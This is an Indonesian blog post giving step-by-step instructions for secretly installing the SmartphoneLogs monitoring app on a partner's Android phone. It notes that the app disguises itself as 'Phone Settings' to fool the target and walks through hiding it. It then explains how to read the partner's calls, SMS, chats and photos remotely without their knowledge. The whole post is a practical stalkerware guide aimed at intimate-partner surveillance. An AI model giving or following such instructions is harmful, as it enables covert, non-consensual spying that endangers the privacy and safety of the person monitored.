Cara Konfigurasi Aplikasi SmartphoneLogs pada Handphone Android

Cara menyadap hp tanpa menyentuh hp korban. Pacar Anda sering sekali menyembunyikan ponselnya ketika bertemu? Jangan-jangan ada sesuatu yang di sembunyikannya. Untuk tahu apa yang dilakukan pacar Anda pada ponselnya sangat mudah sekali. 
Anda cukup menggunakan sebuah aplikasi bernama SmartphoneLogs. Apa itu? SmartphoneLogs merupakan sebuah aplikasi sadap hp android gratis melalui internet yang tentunya dapat mengintai aktivitas handphone pacar Anda dengan mudah dan tentunya tanpa disadari oleh target. Untuk lebih jelas mengenai caranya, simak penjelasannya dihalaman seaskystone.blogspot.com berikut ini.

cara menyadap aktivita hp android dengan aplikasi gratis, Cara Konfigurasi Aplikasi SmartphoneLogs, cara menggunakan smartonelogs, download aplikasi

Cara Konfigurasi Aplikasi SmartphoneLogs pada Handphone Pacar
  1. Download aplikasi SmartphoneLogs dari handphone target atau pacar Anda. Caranya ialah buka situs smartphonelogs.com untuk mulai mendownload aplikasi tersebut.
  2. Setelah situs smartphonelogs.com tersebut terbuka, klik button DOWNLOAD AND INSTALL, kemudian klik lagi DOWNLOAD AND INSTALL NOW. Dan secara otomatis, aplikasi SmartphoneLogs tersebut akan otomatis di download ke handphone target Anda. 
  3. Kemudian setelah aplikasi selesai di download, bukalah aplikasi tersebut untuk melakukan proses instalasi. Saat aplikasi dibuka, nama dari aplikasinya ialah Phone Settings. Mengapa demikian? Penggantian nama tersebut dimaksudkan agar target Anda terkecoh dan tidak sadar jika pada handphonenya terdapat aplikasi sadap. Setelah itu, pilih NEXT pada bagian bawah hingga muncul tulisan INSTALL dan klik link INSTALL tersebut. 
  4. Tunggu hingga proses instalasi selesai dilakukan.
  5. Nah setelah proses instalasi selesai, bukalah aplikasi tersebut. Ingat yah, bahwa nama dari aplikasi ini ialah Phone Setting. Setelah dibuka, lakukan konfigurasi sederhana pada menu setting yang tersedia. Misalkan username dan password yang digunakan untuk login melalui browser. Jika konfigurasi telah usai, klik ACTIVE NOTIFICATION BACKUP. Setelah itu akan muncul sebuah peringatan, Anda tinggal klik OK saja.
  6. Aktifkan notification service lalu kembali ke halaman awal aplikasi dan klik SAVE and HIDE THIS APP. Kemudian akan muncul pesan yang berisi konfigurasi username dan password yang telah di setting sebelumnya.
  7. Setelah itu, klik OK dan pembuatan akun akan berjalan. Dan setelah proses pembuatan akun tersebut telah selesai dan berhasil di lakukan maka aplikasi SmartphoneLogs ini akan otomatis tertutup. Proses konfigurasi pada handphone target pun selesai.

Kemudian selanjutnya tata cara penyadapan yang dapat anda lakukan adalah 
  1. Buka situs smartphonelogs.com yang dapat dilakukan melalui handphone atau komputer Anda. 
  2. Masukkan username dan password yang telah di setting sebelumnya untuk login pada aplikasi tersebut.
  3. Setelah berhasil login, Anda dapat melihat call logs, sms, bbm, chat, galeri dan lainnya. Namun proses backup datanya memang membutuhkan waktu agak lama.

Itulah cara Ketahui Aktivitas HP Pacar dengan SmartphoneLogs. Mudah sekali kan untuk diikuti. Namun ingatlah untuk selalu bijak dalam menggunakan aplikasi ini. Semoga membantu. 

0 Pertanyaan Tentang "Cara Konfigurasi Aplikasi SmartphoneLogs pada Handphone Android"